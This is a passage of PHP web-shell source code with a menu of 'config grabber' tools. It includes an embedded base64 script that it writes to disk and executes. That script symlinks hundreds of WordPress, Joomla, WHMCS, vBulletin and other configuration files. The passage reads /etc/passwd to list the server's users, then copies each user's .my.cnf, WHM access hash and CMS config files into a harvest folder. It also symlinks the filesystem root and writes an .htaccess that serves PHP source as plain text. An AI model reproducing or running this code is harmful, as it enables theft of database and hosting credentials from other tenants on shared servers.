0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
3211. $file = "btm_conf/vhost.cin";
3212. $handle = fopen($file ,"w+");
3213. fwrite($handle ,base64_decode($vhost));
3214. fclose($handle);
3215. chmod($file, 0755);
3216. if(exe("cd btm_conf && ./vhost.cin")) {
3217. echo "<center><a href='$link_config/btm_conf'><font color=lime>Done</font></a></center>";
3218. } else {
3219. echo "<center><a href='$link_config/btm_conf/vhost.cin'><font color=lime>Done</font></a></center>";
3220. }
3221.  
3222. } else {
3223. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
3224. while($passwd = fgets($etc)) {
3225. if($passwd == "" || !$etc) {
3226. echo "<font color=red>Can't read /etc/passwd</font>";
3227. } else {
3228. preg_match_all('/(.*?):x:/', $passwd, $user_config);
3229. foreach($user_config[1] as $user_idx) {
3230. $user_config_dir = "/home/$user_idx/public_html/";
3231. if(is_readable($user_config_dir)) {
3232. $grab_config = array(
3233. "/home/$user_idx/.my.cnf" => "cpanel",
3234. "/home/$user_idx/.accesshash" => "WHM-accesshash",
3235. "$user_config_dir/po-content/config.php" => "Popoji",
3236. "$user_config_dir/vdo_config.php" => "Voodoo",
3237. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
3238. "$user_config_dir/config/koneksi.php" => "Lokomedia",
3239. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
3240. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
3241. "$user_config_dir/whm/configuration.php" => "WHMCS",
3242. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
3243. "$user_config_dir/forum/config.php" => "phpBB",
3244. "$user_config_dir/sites/default/settings.php" => "Drupal",
3245. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
3246. "$user_config_dir/app/etc/local.xml" => "Magento",
3247. "$user_config_dir/joomla/configuration.php" => "Joomla",
3248. "$user_config_dir/configuration.php" => "Joomla",
3249. "$user_config_dir/wp/wp-config.php" => "WordPress",
3250. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
3251. "$user_config_dir/wp-config.php" => "WordPress",
3252. "$user_config_dir/admin/config.php" => "OpenCart",
3253. "$user_config_dir/slconfig.php" => "Sitelok",
3254. "$user_config_dir/conf_global.php" => "conf_global",
3255. "$user_config_dir/inc/config.php" => "inc",
3256. "$user_config_dir/whm/configuration.php" => "whm",
3257. "$user_config_dir/whmcs/configuration.php" => "whmcs",
3258. "$user_config_dir/support/configuration.php" => "supporwhmcs",
3259. "$user_config_dir/whmc/WHM/configuration.php" => "WHM",
3260. "$user_config_dir/whm/WHMCS/configuration.php" => "whmc",
3261. "$user_config_dir/whm/whmcs/configuration.php" => "WHMcs",
3262. "$user_config_dir/support/configuration.php" => "whmcsupp",
3263. "$user_config_dir/clients/configuration.php" => "whmcs-cli",
3264. "$user_config_dir/client/configuration.php" => "whmcs-cl",
3265. "$user_config_dir/clientes/configuration.php" => "whmcs-CL",
3266. "$user_config_dir/cliente/configuration.php" => "whmcs-Cl",
3267. "$user_config_dir/clientsupport/configuration.php" => "whmcs-csup",
3268. "$user_config_dir/billing/configuration.php" => "whmcs-bill",
3269. "$user_config_dir/admin/config.php" => "admin-conf",
3270. "$user_config_dir/application/config/database.php" => "Ellislab",
3271. "$user_config_dir/ticket/include/ost-config.php" => "OST-Ticket",
3272. "$user_config_dir/supports/configuration.php" => "supports.txt",
3273. "$user_config_dir/requires/config.php" => "AM4SS-hosting.txt",
3274. "$user_config_dir/supports/includes/iso4217.php" => "hostbills-supports.txt",
3275. "$user_config_dir/client/includes/iso4217.php" => "hostbills-client.txt",
3276. "$user_config_dir/support/includes/iso4217.php" => "hostbills-support.txt",
3277. "$user_config_dir/billing/includes/iso4217.php" => "hostbills-billing.txt",
3278. "$user_config_dir/billings/includes/iso4217.php" => "hostbills-billings.txt",
3279. "$user_config_dir/host/includes/iso4217.php" => "hostbills-host.txt",
3280. "$user_config_dir/hosts/includes/iso4217.php" => "hostbills-hosts.txt",
3281. "$user_config_dir/hosting/includes/iso4217.php" => "hostbills-hosting.txt",
3282. "$user_config_dir/hostings/includes/iso4217.php" => "hostbills-hostings.txt",
3283. "$user_config_dir/includes/iso4217.php" => "hostbills.txt",
3284. "$user_config_dir/hostbillincludes/iso4217.php" => "hostbills-hostbills.txt",
3285. "$user_config_dir/includes/iso4217.php" => "hostbills-hostbill.txt",
3286. "$user_config_dir/include/ost-config.php" => "OST-Ticket");
3287.  
3288.  
3289. foreach($grab_config as $config => $nama_config) {
3290. $ambil_config = file_get_contents($config);
3291. if($ambil_config == '') {
3292. } else {
3293. $file_config = fopen("btm_conf/$user_idx-$nama_config.txt","w");
3294. fputs($file_config,$ambil_config);
3295. }
3296. }
3297. }
3298. }
3299. }
3300. }
3301. echo "<center><a href='?dir=$dir/btm_conf'><font color=lime>Done</font></a></center>";
3302. }
3303. }
3304. elseif($_GET['do'] == 'config2') {
3305. echo "<center>";
3306. echo "<ul>";
3307. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
3308. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
3309. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3310. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3311. echo "</ul>";
3312. echo "</center>";
3313. if ($_POST["m"] && !$_POST["passwd"] == "") {
3314. echo "<center>Wait plz . . <br><br/>";
3315. $check = @ini_get("disable_functions");
3316. if (eregi("symlink", $check)) {
3317. die("<font color=red>Symlink is Disabled</font>");
3318. }
3319. @mkdir("btmgrab", 0777);
3320. @chdir("btmgrab");
3321. @symlink("/", "root");
3322. $htaccess = "
3323. Options all
3324. Options +Indexes
3325. Options +FollowSymLinks
3326. DirectoryIndex Sux.html
3327. AddType text/plain .php
3328. AddHandler server-parsed .php
3329. AddType text/plain .html
3330. AddHandler txt .html
3331. Require None
3332. Satisfy Any
3333. ";
3334. file_put_contents(".htaccess", $htaccess, FILE_APPEND);
3335. $etc_passwd = $_POST["passwd"];
3336. $etc_passwd = explode("
3337. ", $etc_passwd);
3338. foreach ($etc_passwd as $passwd) {
3339. $pawd = explode(":", $passwd);
3340. $user = $pawd[0];
3341. @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3342. @symlink('/home/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3343. @symlink('/home/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3344. @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3345. @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3346. @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3347. @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3348. @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3349. @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3350. @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3351. @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3352. @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3353. @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3354. @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3355. @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3356. @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3357. @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3358. @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3359. @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3360. @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3361. @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
